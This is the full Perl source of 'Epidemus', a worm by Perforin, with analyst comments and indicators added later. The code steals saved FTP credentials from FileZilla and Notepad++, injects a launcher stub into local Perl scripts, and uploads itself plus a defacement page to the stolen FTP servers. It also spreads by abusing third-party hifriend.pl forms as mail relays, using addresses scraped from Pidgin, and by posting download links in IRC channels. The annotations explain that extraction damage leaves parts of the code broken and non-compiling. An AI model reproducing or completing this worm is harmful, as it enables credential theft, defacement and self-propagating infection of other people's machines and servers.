Epidemus - Webworm by Perforin. Spreading engines: FTP; Mail (uses a whitelist first, then Google); IRC. Mein erster Wurm, den ich komplett in Perl gecodet habe. Auch wenn die Wahrscheinlichkeit nicht hoch ist, dass der Wurm sich auf vielen Maschinen verbreiten kann, rate ich trotzdem davon ab, meine Kreation freizusetzen! Ich hoffe, ihr könnt was aus diesem Code lernen... [English: My first worm, coded entirely in Perl. Even though it is unlikely to spread to many machines, I still advise against releasing my creation! I hope you can learn something from this code...] Note (review): the listing below is a malware sample reproduced from a forum post and is damaged by HTML extraction (stripped tag text inside several regexes, the "¬epadplusplus" entity mangling of a sub call); it does not run as shown and is kept here as an analysis artifact for deriving indicators, not as a working program.
#!/usr/bin/perl
# ---------------------------------------------------------------------------
# ANALYST ANNOTATION (review): this is a malware sample, not a utility.
# The listing was recovered from a forum post and is damaged by HTML
# extraction: the FileZilla parser's regexes lost their XML tag text, the
# call to notepadplusplus() was mangled into "¬epadplusplus" (the "&not"
# entity), and one if() in notepadplusplus() lost its condition and opening
# brace. The code is kept exactly as recovered and does NOT compile; nothing
# has been repaired. Comments describe only what the visible code does, so
# defenders can derive indicators. The script runs without strict/warnings;
# every variable is a package global, which several subs rely on.
#
# Behaviour (each point is grounded in the code below):
#   1. Drop directory %windir%\system32\Microsoft{Core}\ (decoded from the
#      chr(hex()) chains); the running script is rename()d into it last.
#   2. Credential theft: FileZilla recentservers.xml and the Notepad++
#      FTP_synchronize plugin ini (Address/Port/Username/Password lines).
#   3. File infection: the first blank line of one .pl/.pm file listed in
#      the Notepad++ session is replaced by an exec() stub that launches
#      the dropped copy.
#   4. FTP spread: logs in with the stolen credentials, cd to httpdocs or
#      htdocs, uploads itself plus a defacement index.php.
#   5. Mail spread: harvests addresses from Pidgin blist.xml and from
#      .txt/.log/.ini files, then abuses third-party "hifriend.pl"
#      tell-a-friend CGIs (hard-coded list first, then Google results) as
#      mail relays.
#   6. IRC spread: reads the server from mirc.ini, joins as "Epidemus" and
#      posts a download link when any line contains "Hallo".
#
# Indicators visible in the source:
#   files  : index.php, t3mp.tmp, mirz.txt written to the current directory
#   path   : <windir>\system32\Microsoft{Core}\<original script name>
#   IRC    : NICK Epidemus, USER "lol 8 * :lowl.de",
#            PRIVMSG "... gibt es Epidemus zum saugen :D"
#   HTTP   : POST .../hifriend.pl?sp=y with Friends/SenderName/From/PersonalMsg
#            Google query "inurl:hifriend.pl + cgi-bin"
#            User-Agent "Mozilla/5.0 (BeOS; U; BeOS X.6; ...)" (unusual UA)
# ---------------------------------------------------------------------------
=poc
Epidemus - Webworm by Perforin
Spreading Engines:
-FTP
-Mail (uses whitelist first, then google)
-IRC
My first worm that I coded entirely in Perl. Even though the probability that
the worm can spread to many machines is not high, I still advise against
releasing my creation! I hope you can learn something from this code...
Visit DarK-CodeZ.org / vx.perforin.de.vu
ToDo: polymorphic code, threads, ftp scanning
=cut
use Net::FTP;
use IO::Socket::INET;
use File::Basename;

# Environment: %ProgramFiles%, %APPDATA%, the script's own file name and %windir%.
($Programme,$Appdata) = ($ENV{'ProgramFiles'},$ENV{'Appdata'});
($virii,$xswyaq) = (basename($0),$ENV{'windir'});

# Obfuscated path: the chr(hex()) chain decodes to "\system32\Microsoft{Core}\".
# Creates <windir>\system32\Microsoft{Core}\ (mode 0777, return value ignored).
mkdir("$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C')),0777);
# Same chain again: full drop path <windir>\system32\Microsoft{Core}\<script name>.
$pathTOvirus = "$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii";

# Hard-coded third-party hosts whose /cgi-bin/hifriend.pl is abused as a relay
# before Google is queried (see sendmails).
@whitelist = ("answers24x7.org","secretsinfuturestrading.com","bombaypeggys.com","stinkyandsmelly.com");
# Pools for the forged sender address (<rname>@<rdomain>.<tld>).
@rnames = ("staff","help","admin","support","webmaster","public","administrator","root");
@rdomains = ("wikipedia","yahoo","hotmail","gmail","thingeek","slashdot","zone-h","gulli");
@rtlds = ("com","net","de","lu","uk","us","cc","info","ch","fr","tv","fm","it","tk","mobi");

# Defacement text placed into index.php. Line breaks inside this heredoc were
# lost by the extraction and are reconstructed at sentence boundaries.
$payloadText =<<"TEXT";
A new life begins
Obliterate what makes us weak.
Decimate what threatens us.
Destroy Everything!
So a new life can begin.
Destroy Everything!
Rebuild and start again...
TEXT

# Infection stub written into victim .pl/.pm files (see notepadplusplus).
# \$xswyaq and \$ENV are escaped so they are evaluated in the victim script;
# $virii is NOT escaped, so the stub hard-codes this copy's file name.
$activate =<<"ACTIVE";
\$xswyaq = \$ENV{'windir'};
exec("\$xswyaq".chr(hex('5C')).chr(hex('73')).chr(hex('79')).chr(hex('73')).chr(hex('74')).chr(hex('65')).chr(hex('6D')).chr(hex('33')).chr(hex('32')).chr(hex('5C')).chr(hex('4D')).chr(hex('69')).chr(hex('63')).chr(hex('72')).chr(hex('6F')).chr(hex('73')).chr(hex('6F')).chr(hex('66')).chr(hex('74')).chr(hex('7B')).chr(hex('43')).chr(hex('6F')).chr(hex('72')).chr(hex('65')).chr(hex('7D')).chr(hex('5C'))."$virii");
ACTIVE

# Pick one random sender name / domain / TLD for the whole run.
($size1,$size2,$size3) = (scalar(@rdomains),scalar(@rtlds),scalar(@rnames));
($rdomain1,$rdomain2) = (@rdomains[int(rand($size1))],@rtlds[int(rand($size2))]);
($rdomain3,$rname) = ("$rdomain1\.$rdomain2",@rnames[int(rand($size3))]);
# Google result-page offsets used by sendmails.
($zero,$ten,$twenty) = (0,10,20);
$Epidemus = "Epidemus - Webworm v1.0";
# Global: once it reaches 1 no further script is infected (never reset).
$injection_counter = 0;

# Write the defacement page into the current directory; it is uploaded by
# connect(). Unchecked open; element line breaks are reconstructed here.
open(HTML,">","index.php");
print HTML <<"HTML";
<html>
<head>
<title>Chaos never ceases</title>
</head>
<body bgcolor="black" style="color: red">
<center>
<pre>
<b>
$payloadText
</b>
</pre>
<br />
<br />
<h1>$Epidemus</h1>
</center>
HTML
close(HTML);

# Main sequence. "¬epadplusplus" is the HTML-entity-mangled remains of the
# call to notepadplusplus (the "&not" prefix became U+00AC). Note that Mail()
# calls exit when Pidgin's blist.xml is missing, so Mirc() and the final
# rename() only run on hosts that have Pidgin installed.
&FileZilla;
¬epadplusplus;
&connect;
&Mail;
&Mirc;
# Final step: move the running script into the drop directory.
rename($virii,$pathTOvirus);

# Harvest saved FTP credentials from FileZilla's recentservers.xml. The
# opening-tag text of the four m// tests was stripped by the extraction, so
# all four branches now read m/\s\w?/ and only the first can ever match; the
# surviving s/<\/Host>/ ... s/<\/Pass>/ substitutions show they presumably
# matched the <Host>, <Port>, <User> and <Pass> elements. Values are pushed
# into parallel arrays consumed by connect(); the <Pass> content is used
# directly as the login password, i.e. the file is assumed to hold it in
# clear text. Falls through to notepadplusplus (mangled) when the file is
# missing.
sub FileZilla {
    open(FileZilla,"<","$Appdata\\FileZilla\\recentservers.xml") || ¬epadplusplus;
    while (<FileZilla>) {
        if ($_ =~ m/\s\w?/) {
            $_ =~ s/\s//;
            $_ =~ s/<\/Host>\n//;
            $_ =~ s/^\s{11}//;
            push(@PL_Hosts,"$_");
        }
        elsif ($_ =~ m/\s\w?/) {
            $_ =~ s/\s//;
            $_ =~ s/<\/Port>\n//;
            $_ =~ s/^\s{11}//;
            push(@PL_Ports,"$_");
        }
        elsif ($_ =~ m/\s\w?/) {
            $_ =~ s/\s//;
            $_ =~ s/<\/User>\n//;
            $_ =~ s/^\s{11}//;
            push(@PL_Users,"$_");
        }
        elsif ($_ =~ m/\s\w?/) {
            $_ =~ s/\s//;
            $_ =~ s/<\/Pass>\n//;
            $_ =~ s/^\s{11}//;
            push(@PL_Passes,"$_");
        }
    }
    close(FileZilla);
}

# Three jobs: (a) collect file paths from Notepad++'s session.xml into
# @PL_Paths, (b) read FTP credentials from the FTP_synchronize plugin ini,
# (c) for each collected path, inject the exec() stub into the first blank
# line of a .pl/.pm file (once per run, via $injection_counter) or scrape
# e-mail addresses out of .txt/.log/.ini files. Both opens fall through to
# Mail() on failure, so Mail() can run twice in one execution.
# CORRUPTED SEGMENT: the first if() lost its condition and opening brace to
# the extraction (the text between "m/\s" and "$//" was stripped as a tag);
# the brace balance of this sub is therefore wrong in the recovered listing.
sub notepadplusplus {
    open(NotePadPlusPlus,"<","$Appdata\\Notepad++\\session.xml") || &Mail;
    while (<NotePadPlusPlus>) {
        chomp($_);
        if ($_ =~ m/\s$//; if (! m/^\sxOffset=/) { push(@PL_Paths,"$_");} } } close(NotePadPlusPlus);
    # FTP_synchronize plugin: plain key=value lines, password in clear text.
    open(NotePadPlusPlus,"<","$Appdata\\Notepad++\\plugins\\config\\FTP_synchronizeA.ini") || &Mail;
    while (<NotePadPlusPlus>) {
        chomp($_);
        if ($_ =~ m/^Port=\d?/) { $_ =~ s/^Port=//; push(@PL_Ports,"$_"); }
        elsif ($_ =~ m/^Address=\w?/) { $_ =~ s/^Address=//; push(@PL_Hosts,"$_"); }
        elsif ($_ =~ m/^Username=\w?/) { $_ =~ s/^Username=//; push(@PL_Users,"$_"); }
        elsif ($_ =~ m/^Password=\w?/) { $_ =~ s/^Password=//; push(@PL_Passes,"$_"); }
    }
    close(NotePadPlusPlus);
    foreach $Skript (@PL_Paths) {
        if ($Skript =~ m/\.(pl|pm)$/i) {
            # Read whole file, replace the first blank line (up to 10 spaces)
            # with the $activate stub, write it back. "lt" is a string
            # comparison; the counter is global, so only one file per run.
            open(Skript,"<","$Skript");
            @Skript_Inhalt = <Skript>;
            close(Skript);
            for (@Skript_Inhalt) {
                if ($_ =~ m/^\s{0,10}$/) {
                    if ($injection_counter lt 1) {
                        $_ =~ s/^\s{0,10}$/$activate\n/;
                        $injection_counter++;
                    }
                }
            }
            open(Skript,">","$Skript");
            print Skript @Skript_Inhalt;
            close(Skript);
        }
        elsif ($Skript =~ m/\.(txt|log|ini)/) {
            # Crude address scrape: first user@host.tld match per line.
            open(Skript,"<","$Skript");
            @Skript_Inhalt = <Skript>;
            close(Skript);
            for (@Skript_Inhalt) {
                chomp($_);
                if ($_ =~ m/\w+\@\w+\.\w+/) { push(@PL_Mails,"$&"); }
            }
        }
    }
}

# FTP spreading: for every stolen host/port/user/pass tuple, log in, change
# into httpdocs or htdocs if the listing mentions one, upload this script and
# index.php in ASCII mode. The name shadows the connect builtin; the &connect
# call form resolves to this sub. The "|| $count++" on new() and login() does
# not skip the iteration: on failure $ftp holds a plain number and the next
# "->" call is a fatal error, so one unreachable host aborts the run. Hosts
# are recorded in @succesfull regardless of whether put() succeeded.
sub connect {
    $size = scalar(@PL_Hosts);
    for ($count = 0; $count < $size; $count++) {
        $ftp = Net::FTP->new("@PL_Hosts[$count]", Port => @PL_Ports[$count], Debug => 0, Timeout => 3) || $count++;
        $ftp->login("@PL_Users[$count]","@PL_Passes[$count]") || $count++;
        @sh00p = $ftp->dir();
        for $dir (@sh00p) {
            if ($dir =~ m/httpdocs/) { $ftp->cwd("/httpdocs"); }
            elsif ($dir =~ m/htdocs/) { $ftp->cwd("/htdocs"); }
        }
        $ftp->type(A);
        $ftp->put(basename($0));
        $ftp->put("index.php");
        $ftp->quit;
        push(@succesfull,"@PL_Hosts[$count]");
    }
}

# Harvest buddy names that look like e-mail addresses from Pidgin's
# blist.xml, then hand off to sendmails. "|| exit" ends the whole program
# when the file is missing (no Mirc(), no final rename()).
sub Mail {
    open(Pidgin,"<","$Appdata\\.purple\\blist.xml") || exit;
    while (<Pidgin>) {
        if ($_ =~ m/\s<name>\w?/) {
            $_ =~ s/\s<name>//;
            $_ =~ s/<\/name>\n//;
            $_ =~ s/^\s{1,4}//;
            if ($_ =~ m/\w{1,15}\@\w{1,4}/) { push(@PL_Mails,"$_"); }
        }
    }
    close(Pidgin);
    $count = 0;
    &sendmails;
}

# Mail relay abuse. Chooses a relay host: while $count is within the
# hard-coded @whitelist it uses /cgi-bin/hifriend.pl on that host; beyond it
# ("gt" is a string comparison) it scrapes a Google results page for
# "inurl:hifriend.pl + cgi-bin" and takes the first host/path found. Then it
# POSTs one tell-a-friend form per harvested address with a forged sender.
# Defects visible in this listing (left as-is): $addy is never assigned, so
# the Google request carries an empty Host header; $mailconfig{'Server'} is
# never set, so the Host and Referer headers of the POST are empty; the form
# values are not URL-encoded; a failed connect recurses via
# "$count2++ && (&sendmails)" with $count2 reset to 0 on re-entry. The
# advertised link hard-codes "Epidemus.pl" while the uploaded file keeps the
# script's real name ($virii).
sub sendmails {
    $whitelisted = scalar(@whitelist);
    $suxxes = scalar(@succesfull);
    # Random host the worm believes it was uploaded to (see connect()).
    $server = @succesfull[int(rand($suxxes))];
    $mailText =<<"MAIL";
Hey! Epidemus auf dem Weg um die Welt.
$server/Epidemus.pl <--- Gratis Download!
MAIL
    if ($count gt $whitelisted) {
        $count2 = 0;
        # Random results page: start=0, 10 or 20.
        $rnd = int(rand(3));
        if ($rnd eq 0) { $gPage = $zero; } elsif ($rnd eq 1) { $gPage = $ten; } else { $gPage = $twenty; }
        $qry = 'client=mozilla&rls=de&hs=duV&q=inurl%3Ahifriend.pl+%2B+cgi-bin&btnG=Suche&lr=&start='."$gPage".'&sa=N';
        $sock = new IO::Socket::INET(PeerAddr => "www.google.com", PeerPort => 80, Proto => 'tcp', Timeout => 2) || exit;
        print $sock "GET /search?$qry HTTP/1.1\r\n";
        print $sock "Host: $addy\r\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\r\n";
        print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        print $sock "Connection: close\n";
        print $sock "\r\n\r\n";
        # Result lines mentioning hifriend are split on '"' into a temp file
        # (t3mp.tmp in the CWD), then re-read to pull out host and path.
        open(TMP,">","t3mp.tmp");
        while(<$sock>) {
            if (m/\<div id=ssb\>/) {
                if (m/\w?hifriend\w?/) { $_ =~ s/"/\n/ig; print TMP $_; }
            }
        }
        close(TMP);
        open(TMP,"<","t3mp.tmp");
        while (<TMP>) {
            chomp($_);
            if (m/^http:\/\// && m/cgi-bin/) {
                if(! m/google/ && ! m/search?/) {
                    if(m/w?\.?\w+\.\w+\.\w+\.?\w+/) { push(@gHosts,$&); }
                    if (m/\/cgi-bin\/\w+\/hifriend.pl$/) { push(@gPaths,$&); }
                }
            }
        }
        close(TMP);
        unlink("t3mp.tmp");
        foreach (@gPaths) { $_ =~ s/hifriend.pl$//; }
        $sock = new IO::Socket::INET(PeerAddr => @gHosts[$count2], PeerPort => 80, Proto => 'tcp', Timeout => 2) || $count2++ && (&sendmails);
        %mailconfig = ( Path => @gPaths[$count2], From => "$rname".chr(64)."$rdomain3", Name => "Your $rdomain3 support!", MSG => "$mailText" );
    } else {
        $sock = new IO::Socket::INET(PeerAddr => @whitelist[$count], PeerPort => 80, Proto => 'tcp', Timeout => 2) || $count++ && (&sendmails);
        %mailconfig = ( Path => "/cgi-bin/", From => "$rname".chr(64)."$rdomain3", Name => "Your $rdomain3 support!", MSG => "$mailText" );
    }
    # One POST per address over the same socket; headers use bare "\n" and
    # User-Agent / Accept-Language are each sent twice.
    foreach $mail (@PL_Mails) {
        $data = 'refpage=&reftitle=&Friends='.$mail.'&SenderName='.$mailconfig{'Name'}.'&From='.$mailconfig{'From'}.'&PersonalMsg='.$mailconfig{'MSG'};
        $lngt = length($data);
        print $sock "POST $mailconfig{'Path'}hifriend.pl?sp=y HTTP/1.1\n";
        print $sock "Host: $mailconfig{'Server'}\n";
        print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12\n";
        print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
        print $sock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\n";
        print $sock "Accept-Encoding: gzip,deflate\n";
        print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
        print $sock "Keep-Alive: 300\n";
        print $sock "Connection: keep-alive\n";
        print $sock "Referer: $mailconfig{'Server'}/cgi-bin/hifriend.pl\n";
        print $sock "Accept-Language: en-us\n";
        print $sock "Content-Type: application/x-www-form-urlencoded\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20070421 Firefox/2.0.0\n";
        print $sock "Content-Length: $lngt\n\n";
        print $sock "$data\n";
    }
}

# IRC spreading. Reads the "host=" line of mirc.ini (NoNameScript profile
# first, then %ProgramFiles%\mIRC), splits it on ':' into lines through a
# temp file (mirz.txt in the CWD) and takes fields 1 and 3 as server and
# channel — whether field 3 is really a channel in mIRC's ini layout is not
# verifiable from this code. Connects to port 6667 as NICK "Epidemus" with
# USER "lol 8 * :lowl.de", answers PING, and on the first line containing
# "Hallo" posts the download link to the channel and disconnects. Both
# "|| last" fall-backs are outside any loop: in Perl that is a fatal runtime
# error ("Can't \"last\" outside a loop block"), not a quiet return.
sub Mirc {
    open(MirC,"<","$Appdata\\NoNameScript\\mirc.ini") || open(MirC,"<","$Programme\\mIRC\\mirc.ini") || last;
    while (<MirC>) {
        chomp($_);
        if ($_ =~ m/^host=/) {
            $_ =~ s/^host=//;
            $_ =~ s/:/\n/ig;
            open(EpMi,">","mirz.txt");
            { print EpMi $_; }
            close(EpMi);
        }
    }
    close(MirC);
    open(EpMi,"<","mirz.txt");
    @CNFG = <EpMi>;
    close(EpMi);
    unlink("mirz.txt");
    ($SRVR,$CHN) = (@CNFG[1],@CNFG[3]);
    ($NIKK,$M4IL) = ("Epidemus","lol 8 * :lowl.de");
    chomp($SRVR);
    $spredVIAmirc = new IO::Socket::INET( PeerAddr => $SRVR, PeerPort => 6667, Proto => 'tcp', ) || last;
    print $spredVIAmirc "NICK $NIKK\r\n";
    print $spredVIAmirc "USER $M4IL\r\n";
    print $spredVIAmirc "JOIN $CHN\r\n";
    while ($output = <$spredVIAmirc>) {
        if ($output =~ m/^PING (.*?)$/gi) { print $spredVIAmirc "PONG ".$1."\n"; }
        elsif ($output =~ m/Hallo/i) {
            # $server comes from sendmails(); $virii is this script's name.
            (print $spredVIAmirc "PRIVMSG $CHN :Hey voll geil, hier auf $server/$virii gibt es Epidemus zum saugen :D\r\n");
            last;
        }
    }
}